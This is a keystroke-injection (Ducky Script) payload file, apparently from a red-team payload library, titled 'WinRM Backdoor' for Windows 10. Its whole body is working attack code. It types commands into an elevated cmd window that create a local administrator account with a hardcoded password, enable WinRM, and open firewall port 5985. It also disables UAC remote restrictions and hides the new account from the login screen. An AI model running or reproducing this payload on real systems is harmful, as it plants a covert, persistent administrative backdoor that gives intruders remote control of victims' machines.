Path: blob/master/payloads/library/remote_access/win_winrm-backdoor/payload.txt
3018 views
REM #1REM # Title: "Microsoft Windows" WinRM Backdoor2REM #3REM # Description:4REM # 1) Adds a user account (RD_User:RD_P@ssW0rD).5REM # 2) Adds this local user to local administrator group.6REM # 3) Enables "Windows Remote Management" with default settings.7REM # 4) Adds a rule to the firewall.8REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.9REM # 6) Hides this user account.10REM #11REM # Author: TW-D12REM # Version: 1.013REM # Category: Remote Access14REM # Target: Microsoft Windows15REM #16REM # TESTED ON17REM # ===============18REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)19REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)20REM #21REM # REQUIREMENTS22REM # ===============23REM # The target user must belong to the 'Administrators' group.24REM #2526REM ######## INITIALIZATION ########2728DELAY 20002930REM ######## STAGE1 ########3132GUI r33DELAY 300034STRING cmd35DELAY 100036CTRL-SHIFT ENTER37DELAY 300038LEFTARROW39DELAY 500040ENTER41DELAY 50004243REM ######## STAGE2 ########4445STRING NET USER RD_User RD_P@ssW0rD /ADD46ENTER47DELAY 15004849STRING NET LOCALGROUP Administrators RD_User /ADD50ENTER51DELAY 15005253REM ######## STAGE3 ########5455STRING WINRM QUICKCONFIG56ENTER57DELAY 40005859STRING y60ENTER61DELAY 15006263STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for RD" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN64ENTER65DELAY 15006667REM ######## STAGE4 ########6869STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 170ENTER71DELAY 15007273STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v RD_User /t REG_DWORD /d 074ENTER75DELAY 15007677REM ######## FINISH ########7879STRING EXIT80ENTER818283